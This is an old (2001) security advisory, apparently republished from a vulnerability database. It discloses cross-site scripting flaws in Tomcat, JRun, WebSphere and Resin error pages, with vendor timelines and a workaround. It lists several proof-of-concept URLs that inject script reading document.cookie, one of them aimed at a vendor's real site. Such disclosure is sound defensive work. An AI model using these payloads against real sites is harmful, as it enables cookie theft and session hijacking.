Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability

2001-07-03T00:00:00
ID SECURITYVULNS:DOC:1801
Type securityvulns
Reporter Securityvulns
Modified 2001-07-03T00:00:00

Description

Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability

Affected products:

Tomcat 3.2.1, 3.2.2-beta, 4.0-beta <http://jakarta.apache.org/tomcat/> JRun 3.0 <http://www.allaire.com/products/jrun/index.cfm> WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional <http://www-4.ibm.com/software/webservers/> Resin <http://www.caucho.com/products/resin/>

Not affected:

Unknown

Problem:

Accessing the following URLs, the JavaScript code will be executed in the browser on the server's domain.

Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp JRun 3.0: http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml WebSphere 3.5 FP2: http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT> WebSphere 3.02: http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp VisualAge for Java 3.5 Professional:

http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT> Resin 1.2.2: http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

These pages produce output like this: ================================================= Error 404 An error has occurred while processing request: http://WebSphere/webapp/examples/**

Message: File not found: //** StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //* at javax.servlet.ServletException.<init>(ServletException.java:107) at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31) at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20) at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97) ... ================================================= ***: The JavaScript code is executed here.

This vulnerability is quite similar to "IIS cross-site scripting vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000. <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>

Impact:

For the detail about cross-site scripting, see the following pages. <http://www.cert.org/advisories/CA-2000-02.html> <http://www.microsoft.com/TechNet/security/crssite.asp> <http://www.apache.org/info/css-security/>

Vendor status:

Tomcat: ====== Notified: 16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code@apache.org 17 Mar 2001 18:55:45 +0900, tomcat-dev@jakarta.apache.org Response: 17 Mar 2001 20:07:42 -0000 Fix: 30 Mar 2001, Tomcat 4.0-beta-2 (maybe) 11 May 2001, Tomcat 3.2.2-beta-5 (maybe) Announcement: <http://jakarta.apache.org/tomcat/news.html>

  Sun Microsystems does not publish Tomcat vulnerabilities.
  &lt;http://java.sun.com/products/jsp/tomcat/&gt;
  &lt;http://java.sun.com/sfaq/chronology.html&gt;

JRun: ==== Notified: 13 Mar 2001 23:11:54 +0900, secure@allaire.com Response: 13 Mar 2001 09:43:49 -0500 14 Mar 2001 09:05:03 -0500 Fix: 28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available. Announcement: <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full> Macromedia Product Security Bulletin (MPSB01-06) JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability (a.k.a. JavaScript code execution vulnerability)

WebSphere: ========= Notified: 20 Mar 2001 08:13:30 +0900, *@us.ibm.com Response: 22 Mar 2001 09:14:01 -0500 23 Mar 2001 00:02:58 +0900 Fix: PQ47386V302x (?) <http://www-4.ibm.com/software/webservers/appserv/efix.html> Announcement:

<http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb> (in Japanese)

Resin: ===== Notified: 16 Mar 2001 02:26:47 +0900, bugs@caucho.com, resin@caucho.com Response: None Fix: Unknown Announcement: Unknown http://www.caucho.com/products/resin/changes.xtp

Workaround:

Customize error pages.

-- Hiromitsu Takagi, Ph.D. National Institute of Advanced Industrial Science and Technology, Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan http://www.etl.go.jp/~takagi/